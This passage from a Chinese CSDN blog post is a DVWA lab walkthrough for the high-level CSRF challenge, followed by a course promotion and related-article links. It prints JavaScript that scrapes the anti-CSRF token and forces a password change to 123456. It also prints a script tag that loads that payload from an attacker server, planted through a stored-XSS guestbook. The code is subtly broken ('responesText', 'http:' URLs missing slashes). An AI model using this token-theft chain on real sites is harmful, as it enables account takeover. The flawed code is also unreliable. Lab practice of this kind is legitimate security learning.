网络安全最全DVWA中CSRF高级_dvwa csrf 高级

最新推荐文章于 2024-08-20 11:12:31 发布
最新推荐文章于 2024-08-20 11:12:31 发布
阅读量270 收藏 5
点赞数 2
分类专栏: 程序员 文章标签: web安全 csrf 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84302369/article/details/138442174
版权 
http://192.168.112.188/dvwa/vulnerabilities/csrf/

页面,然后从相应中取得Token(通过正则表达式提取)取得后在将Token和新密发一起发送给

http:192.168.112.188/dvwa/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change

页面完成密码修改

(4)先构造一个Javascript原生代码发送AJAX请求的代码

var tokenUrl='http://192.168.112.188/dvwa/vulnerabilities/csrf/';
var count = 0;
//实例化XMLHttpRequest,用于发送AJAX请求
xmlhttp = new XMLHttpRequest();
//当请求状态发生变化时,触发执行代码
xmlhttp.onreadystatechange = function(){
    //状态码0:请求未初始化,1:服务器连接已建立,2请求已接收,3请求处理中,4请求已完成,且相应已就绪
    if(xmlhttp.readyState == 4&&xmlhttp.status == 200)
    {
        //取得请求的响应,并从响应中通过正则提取Token
        var text = xmlhttp.responesText;
        var regex = /user_token\'value\=\'(.*?)\' \/\>/;
        var match = text.match(regex);
        //alert(match[1]);
        var token = match[1];
        //发送修改密码的语法
        var changeUrl='http:192.168.112.188/dvwa/vulnerabilities/csrf/?user_token='+token+'&                    password_new=123456&password_conf=123456&Change=Change';
        if(count == 0){
            count = 1; //只发送一次,否则会多次发送
            xmlhttp.open("GET",changeUrl,false); //false代表同步方式发送
            xmlhttp.send();
        }
    }
};
xmlhttp.open("GET",tokenUrl,false);
xmlhttp.send();

将上述代码放置在攻击服务器上

想办法将上述JS代码嵌入到被攻击者服务器上即可完成。(High级别无法实现)

<script src="http://192.168.112.183/csrf.js"></script>

在high级别中,屏蔽了

处理方式:先切换到Low级,在留言本里注入以下脚本,然后在切换到High级,直接触发改密

<script src="http://192.168.112.183/csrf.js"></script>

学习路线:

这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不过,要想从脚本小子变成黑客大神,这个方向越往后,需要学习和掌握的东西就会越来越多以下是网络渗透需要学习的内容:
在这里插入图片描述

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

2401_84302369
关注
专栏目录
DVWA1.10_CSRF
whime
07-11 335
LOW 服务器收到提交的新密码和确认密码之后,比较是否相同,相同则修改密码,没有任何防护机制。此处可以简单构造带有参数的链接诱导用户点击: http://192.168.29.128/DVWA-master/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change# 但是点击之后会出现修改成功页面,用户很容易发现密码已经被修改了。 攻击者还可以诱导用户访问特定页面,将链接隐藏在标签.
DVWA 靶场CSRF(low)
qq_14902381的博客
08-15 1475
dvwa靶场,csrf利用
DVWACSRF高级
m0_73896875的博客
07-11 300
(2)再次访问CSRF页面Token值发生了变化,可以确定DVWA生成Token的机制是每次不一样/页面,然后从相应取得Token(通过正则表达式提取)取得后在将Token和新密发一起发送给。处理方式:先切换到Low级,在留言本里注入以下脚本,然后在切换到High级,直接触发改密。(High级别无法实现)(4)先构造一个Javascript原生代码发送AJAX请求的代码。(1)访问CSRF页面,在页面的源代码可以看到生成的Token。在high级别,屏蔽了标签,所以无法直接利用。
DVWA csrf高级
weixin_69374202的博客
05-25 321
受害者主机ip 192.168.11.59(虚拟机)攻击者主机ip : 192.168.11.30(物理机)测试网络连通性。
DVWACSRF
RexHa的博客
09-30 7667
CSRF,跨站域请求伪造,通常攻击者会伪造一个场景(例如一条链接),来诱使用户点击,用户一旦点击,黑客的攻击目的也就达到了,他可以盗用你的身份,以你的名义发送恶意请求。
DVWACSRF_全级别
weixin_45378289的博客
07-04 360
1.low级别 <?php if( isset( $_GET[ 'Change' ] ) ) { // Get input $pass_new = $_GET[ 'password_new' ]; $pass_conf = $_GET[ 'password_conf' ]; // Do the passwords match? if( $pass_new == $pass_conf ) { // They do! $pass
DvwaCSRF全级别学习笔记
Mbys_Lettuce的博客
09-27 306
CSRF,全称Cross-site request forgery,就是跨站请求伪造,指利用受害者尚未失效的身份认证信息,诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向服务器发送请求,从而完成非法操作(如转账、改密等)。本次直接使用low级别的还能攻击成功的原因是,我将恶意网站放在了该网站的服务器里,导致被攻击者访问时点击进入恶意网站,发出修改指令的文件头还是这个主机,所以才能试验成功,通常情况下可以通过上传漏洞将文件传入被攻击者网页。本文为学习笔记,仅供学习!
dvwacsrf
qq_17762247的博客
05-15 379
一、简介 CSRF是指在受害人不知情的情况下,以其身份向服务器发送服务器发送请求,从而执行非法操作(转账,改密等)。以转账为例,受害人A使用浏览器登录某银行网站B完成查看余额操作后,在未退出的情况下访问了攻击网站C,C利用浏览器的Session伪造转账请求发送给B,由于B发现该转账请求包含用户登录信息,转账成功。Cross-site是指受害者在访问网站C时给网站B发送了请求,request forgery是指该请求是网站C伪造的,并不是A的本意。 二、Low 1、服务器端代码 <?php if(
DVWA下的CSRF攻防实战(详解)
一期一会的博客
04-20 4724
DVWA下的CSRF攻防实战(详解) 我们简单谈一谈CSRF与XSS的区别: CSRF (cross site request forgery)跨站请求伪造。CSRF是用户在不知情的情况下提交请求,而XSS是用户自己点击链接来访问网页。 整个攻击过程: 用户浏览并登录受信任网站A(dvwa),登录成功以后网站A会返回浏览器的信息带有已登录的cookie,cookie信息会在浏览器端保存一定时间(根据浏览器设置而定),在用户没有退出网站A的情况下访问恶意站点B(这里在win2003制作一个危险网站),该危
DVWACSRF攻击(Low&medium&High)
liweibin812的博客
01-14 5212
CSRF,全称Cross-site request forgery,翻译过来就是跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)。CSRF与XSS最大的区别就在于,CSRF并没有盗取cookie而是直接利用。在20...
DVWACSRF-High跨站请求伪造高级
qq_39330735的博客
02-09 446
DVWACSRF-High跨站请求伪造高级,通过XSS漏洞联合使用的方法来实现。
DVWA-CSRF跨站请求伪造 -High级别
xmj818719的博客
02-27 1483
基础知识介绍csrf攻击流程 实验环境: CSRF模拟攻击环境(这里是内网环境,公网只需要对端口进行映射即可,其他操作同理) CentOS7 DVWA服务器(模拟转账系统) 192.168.0.9 kali 黑客(攻击者) 192.168.0.2 Win10 用户(受害者) 192.168.0.5 1使用条件: 1、使用关闭XSS的chrome浏览器 新建chrome浏览器快捷方式 “C:\Program Files (x86)\Google\Chrome\chrome-xss.e
dvwa_csrf攻击_high
weixin_30492601的博客
02-18 332
dvwa_csrf攻击_high <script type="text/javascript"> function attack() { document.getElementsByName('user_token')[0].value=document.getElementById("hack")....
DVWA-CSRF-High
最新发布
YhMjQx的博客
08-20 644
本篇文章主要讲解DVWA靶场CSRF高级
代码审计—DVWACSRF—high
王嘟嘟的博客
10-31 971
0x00 前言 如饥似渴的学习ing。 你可能需要看看: https://blog.csdn.net/qq_36869808/article/details/83029980 0x01 start 1.黑盒测试 发现这里带了Token。 说实话我不会利用,哈哈。直接白盒看看吧。 白盒 通过和这个来判断Token,但是这里网上都说可以通过xss来获取session来进行判断。然后进行伪造等等,但...
DVWA全级别教程学习及备课笔记:之CSRF
lm19770429的专栏
10-05 349
CSRF(Cross-site request forgery) CSRF,全称Cross-site request forgery,翻译过来就是跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)。CSRF与XSS最大的区别就在于,CSRF并没有盗取cookie而是直接利用。 在2013年发布的新版OWASP Top 10
新手指南:DVWA-1.9全级别教程之CSRF
weixin_50464560的博客
03-19 507
目前,最新的DVWA已经更新到1.9版本(http://www.dvwa.co.uk/),而网上的教程大多停留在旧版本,并且没有针对DVWA high级别的教程,因此萌发了一个撰写新手教程的想法,错误的地方还请大家指正。DVWA简介DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。DVWA共有十个模块,分...
零基础怎么学python?(1)
2401_84302655的博客
04-30 846
如果对Python感兴趣的话,可以试试我的学习方法以及相关的学习资料Python所有方向的学习路线Python所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。二、Python必备开发工具。
DVWA系列之17 CSRF***介绍与实施
weixin_34318272的博客
12-24 99
CSRF(Cross-Site Request Forgery)跨站点请求伪造,这种***方式的特点是:***者盗用你的身份,以你的名义进行某些非法操作。CSRF能够使用你的帐户发送邮件,获取你的敏感信息,甚至盗走你的财产。当我们打开或登录某个网站后,在浏览器与网站之间将会产生一个会话,在这个会话没有结束时,你就可以利用你的权限对网站进行某些操作,如:发表文章、发送邮件、删除文章等。当这个会话结束...
dvwa+csrf高级
10-14
DVWA(Damn Vulnerable Web Application)是一个用于练习Web应用程序渗透测试的漏洞演示平台,而CSRF(Cross-Site Request Forgery)则是一种常见的Web应用程序安全漏洞。在DVWA,可以通过模拟CSRF攻击来学习和理解这种漏洞的工作原理和防御方法。 高级CSRF攻击通常涉及到一些复杂的技术,例如利用JavaScript代码来构造恶意请求、使用多个跨域站点进行攻击等。为了防止这种攻击,开发人员可以采取一些措施,例如使用CSRF令牌、检查Referer头等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值